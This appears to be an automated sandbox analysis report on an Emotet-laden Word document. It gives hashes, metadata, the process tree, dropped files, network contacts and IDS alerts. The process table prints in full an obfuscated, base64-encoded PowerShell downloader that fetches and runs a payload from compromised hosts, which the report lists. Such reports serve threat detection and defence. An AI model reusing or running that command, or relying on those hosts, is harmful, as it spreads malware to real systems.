File name: | a58df7861aaef0038d6028f76318c5c8.c3dac6d3ba1f95d49bee4e37858f1ff8433cf5fc.primary_analysis_subject |
Full analysis: | https://app.any.run/tasks/bf09200d-aeda-4895-ba61-30d48c1ff3c3 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 30, 2020, 09:50:26 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Dolorem., Author: Clment Richard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 18:52:00 2020, Last Saved Time/Date: Tue Sep 29 18:52:00 2020, Number of Pages: 1, Number of Words: 3810, Number of Characters: 21718, Security: 8 |
MD5: | A58DF7861AAEF0038D6028F76318C5C8 |
SHA1: | C3DAC6D3BA1F95D49BEE4E37858F1FF8433CF5FC |
SHA256: | 8666706E9EE66B8E782269A6C387B2CE242C017E7507BC5D65FCBEDBC021F2C4 |
SSDEEP: | 768:FQ6UUXZsPTX14VTL02vTf9fH1n6PT1Ms+0/qnYKTi9TwsRT/tr3wpdQ:4CVTLNTf9f5cTB+iqhsx/FAY |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Dolorem. |
---|---|
Subject: | - |
Author: | Clément Richard |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:09:29 17:52:00 |
ModifyDate: | 2020:09:29 17:52:00 |
Pages: | 1 |
Words: | 3810 |
Characters: | 21718 |
Security: | Locked for annotations |
Company: | - |
Lines: | 180 |
Paragraphs: | 50 |
CharCountWithSpaces: | 25478 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1500 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a58df7861aaef0038d6028f76318c5c8.c3dac6d3ba1f95d49bee4e37858f1ff8433cf5fc.primary_analysis_subject.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3356 | POwersheLL -ENCOD JABQADcAdAAwADAAbQBzAD0AKAAoACcARgBkACcAKwAnADQAJwApACsAKAAnADQAJwArACcAbgA1AHMAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABFAG4AVgA6AHUAcwBFAFIAcABSAG8ARgBpAGwARQBcAHAARABtADQANgB3AHcAXABSADIAWQBIAEEANQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAEUAYwB0AG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBDAFUAUgBJAHQAYAB5AHAAYABSAE8AVABPAGMATwBMACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAnACsAJwAyACwAIAAnACkAKwAnAHQAJwArACcAbAAnACsAKAAnAHMAMQAnACsAJwAxACwAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQAWQB0AGkAMABhAGcAZQAgAD0AIAAoACcAUwAnACsAJwBsACcAKwAoACcAawAwAGwAJwArACcAdgAnACkAKQA7ACQAWAAwADQAdgBlAHIAXwA9ACgAKAAnAEMAJwArACcAdgBsACcAKQArACcAbgAnACsAKAAnAGUAeAAnACsAJwBnACcAKQApADsAJABOAHYAMABqADcAZgBoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAEkAJwArACgAJwBRAG0AUABkAG0AJwArACcANAA2AHcAJwArACcAdwBJACcAKQArACcAUQAnACsAKAAnAG0AJwArACcAUgAyAHkAaAAnACsAJwBhADUAOQBJAFEAJwArACcAbQAnACkAKQAgACAALQBSAGUAcABMAEEAYwBFACgAJwBJACcAKwAnAFEAbQAnACkALABbAGMAaABhAHIAXQA5ADIAKQArACQAWQB0AGkAMABhAGcAZQArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEcAdwBnAHYAMgA1ADUAPQAoACgAJwBWACcAKwAnAGoAdAB0AHoAJwApACsAJwB0AF8AJwApADsAJABPAF8AYwBiAHQAOAB3AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcAZQBCAGMAbABJAEUAbgBUADsAJABIAHAAMQAxAGwAdwA0AD0AKAAoACcAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwBsACcAKQArACgAJwBiAGwAYwBvAG0AcAB1AHQAYQAnACsAJwBjAGkAJwArACcAbwAnACsAJwBuAC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAHMAZQAnACkAKwAnAHIAdgAnACsAJwBpACcAKwAoACcAYwAnACsAJwBlAHMAJwApACsAKAAnAC8AJwArACcAZQBZACcAKwAnADMALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwBzACcAKwAnAGgAbwAnACsAJwBwAC4AaAAnACkAKwAoACcAbwBtAGUAbgAnACsAJwBoAGUAJwApACsAJwBhACcAKwAnAGwAdAAnACsAKAAnAGgAeQAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAJwBpACcAKwAnAG4AJwArACgAJwBjAGwAdQBkAGUAJwArACcAcwAnACkAKwAoACcALwAnACsAJwBMAHQAagAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvAHIAJwArACcAYQBpACcAKQArACgAJwBuAHQAbwBkAGEAJwArACcAeQAnACsAJwAuACcAKQArACgAJwBvAHIAJwArACcAZwAvAHcAcAAnACsAJwAtAGEAZABtACcAKQArACgAJwBpAG4AJwArACcALwBCACcAKwAnAC8AKgBoACcAKwAnAHQAdABwAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwBxAHUAYQBsAGkAJwArACcAdAB5AGMAJwArACcAaABpACcAKwAnAGwAZABjACcAKQArACgAJwBhACcAKwAnAHIAJwArACcAZQBwACcAKwAnAHIAJwArACcAZQBzAGMAaABvAG8AbAAuACcAKQArACgAJwBjAG8AbQAvACcAKwAnAGUAbQBxACcAKwAnAGIAJwArACcAbABrAC8AbQAnACsAJwAvACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAcwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuACcAKwAoACcAdAAnACsAJwBlAGsAJwArACcAYQBkAGIAJwApACsAKAAnAGEAJwArACcAdABhAG0AJwApACsAKAAnAC4AYwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACsAJwBlAG4AdAAvAFEAcQAvACoAJwArACcAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAoACcAcwA6AC8AJwArACcALwBiAG8AawBlAC4AeAAnACsAJwBpACcAKwAnAGEAbwB4AGkAZQBrAGUAagAnACsAJwBpAC4AdABvACcAKQArACcAcAAvACcAKwAnADkAYQAnACsAKAAnADYANQAnACsAJwA0ACcAKQArACgAJwB6ACcAKwAnAG8AcgAvAEoAbgBTAC8AKgBoAHQAdAAnACsAJwBwADoAJwApACsAJwAvACcAKwAoACcALwB5AHMALgB4ACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAbwB4AGkAZQBrACcAKwAnAGUAJwApACsAJwBqACcAKwAnAGkALgAnACsAJwB0ACcAKwAoACcAbwBwAC8AdwAnACsAJwBwAC0AYQBkACcAKwAnAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAHUAUQBZACcAKwAnAC8AJwApACkALgAiAHMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQB0AHgAXwBnADIAbgA9ACgAJwBGACcAKwAnAHMAegAnACsAKAAnAGgAYwByACcAKwAnAG8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABJADUANgA3AGIAeABvACAAaQBuACAAJABIAHAAMQAxAGwAdwA0ACkAewB0AHIAeQB7ACQATwBfAGMAYgB0ADgAdwAuACIARABPAFcAYABOAGwAYABvAEEAZABmAEkATABFACIAKAAkAEkANQA2ADcAYgB4AG8ALAAgACQATgB2ADAAagA3AGYAaAApADsAJABOADEAYgBuAGYAXwB3AD0AKAAoACcARAAnACsAJwBfADMAJwApACsAJwA3ADkAJwArACcAcgA4ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABOAHYAMABqADcAZgBoACkALgAiAGwAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwAxADMAMgAwACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AJwArACcAawBlAC0ASQB0AGUAbQAnACkAKAAkAE4AdgAwAGoANwBmAGgAKQA7ACQAUwBtAHYAYQBnAG8AcwA9ACgAJwBNACcAKwAoACcAbgBpAGUAdwAnACsAJwAyACcAKQArACcAbgAnACkAOwBiAHIAZQBhAGsAOwAkAEEAXwBfAHMAeAByAGIAPQAoACcATwAnACsAKAAnADYAJwArACcAZwBfACcAKQArACgAJwByACcAKwAnADIAMgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAB3AG4AZgA0AHMAbgA9ACgAJwBPACcAKwAoACcAZAB5AHcAbgAnACsAJwAwAHQAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4020 | "C:\Users\admin\Pdm46ww\R2yha59\Slk0lv.exe" | C:\Users\admin\Pdm46ww\R2yha59\Slk0lv.exe | POwersheLL.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Exit code: 0 Version: 2.8.0.3 | ||||
2864 | "C:\Users\admin\AppData\Local\ir32_32\hid.exe" | C:\Users\admin\AppData\Local\ir32_32\hid.exe | Slk0lv.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Version: 2.8.0.3 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1500 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRBB81.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3356 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TO8TRJ4F6INYG48RPM2I.temp | — | |
MD5:— | SHA256:— | |||
4020 | Slk0lv.exe | C:\Users\admin\AppData\Local\Temp\~DF36C97E9C62524599.TMP | — | |
MD5:— | SHA256:— | |||
1500 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\config14[1].xml | — | |
MD5:— | SHA256:— | |||
1500 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Cab8A6A.tmp | — | |
MD5:— | SHA256:— | |||
1500 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Tar8A6B.tmp | — | |
MD5:— | SHA256:— | |||
1500 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:ACDE23E2430B636E10A7447ECE5D611C | SHA256:87D43D07A7CE38A6F6AE5F5177E167A0DFEC21BEBE613C8987EDDE87A93D2B5F | |||
1500 | WINWORD.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F | der | |
MD5:B4D10D658837BB64ABDA5C707A0D0DB9 | SHA256:24F11D8B4D250B68BAD78A8CDC1D12FF374E136FBA6323993E8DCEB554AA9A72 | |||
3356 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
3356 | POwersheLL.exe | C:\Users\admin\Pdm46ww\R2yha59\Slk0lv.exe | executable | |
MD5:2D09DD4D4F83A81F1FEA0889074B7A85 | SHA256:BAB3EABC676BD25EAE3A491A425BDC9242A58B87633CBB0CD0EE59E095C03349 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1500 | WINWORD.EXE | GET | 200 | 52.109.88.8:80 | http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023 | NL | xml | 1.99 Kb | whitelisted |
1500 | WINWORD.EXE | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAtqs7A%2Bsan2xGCSaqjN%2FrM%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1500 | WINWORD.EXE | 52.109.88.8:80 | office14client.microsoft.com | Microsoft Corporation | NL | whitelisted |
3356 | POwersheLL.exe | 34.67.97.45:80 | shop.homenhealthy.com | — | US | suspicious |
2864 | hid.exe | 202.22.141.45:80 | — | OFFRATEL | NC | malicious |
3356 | POwersheLL.exe | 66.97.41.90:80 | lblcomputacion.com | Peer 1 Network (USA) Inc. | US | suspicious |
1500 | WINWORD.EXE | 52.109.120.29:443 | rr.office.microsoft.com | Microsoft Corporation | HK | whitelisted |
1500 | WINWORD.EXE | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
lblcomputacion.com |
| suspicious |
shop.homenhealthy.com |
| suspicious |
office14client.microsoft.com |
| whitelisted |
rr.office.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3356 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3356 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3356 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |